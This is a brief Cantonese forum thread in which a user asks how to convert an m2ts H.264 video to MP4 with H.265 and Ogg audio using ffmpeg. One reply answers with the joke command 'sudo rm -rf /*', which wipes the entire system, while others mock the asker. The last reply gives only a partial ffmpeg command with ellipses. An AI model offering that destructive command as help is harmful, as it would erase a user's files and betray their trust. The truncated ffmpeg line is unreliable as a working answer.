ffmepg 點用

想 convert m2ts h264 to mp4 h265 ogg

請指教

拉

sudo rm -rf /*

睇av用

係呢度問呢D野邊有人會答你？

fffmpeg -i input.m2ts ... ....output.mp4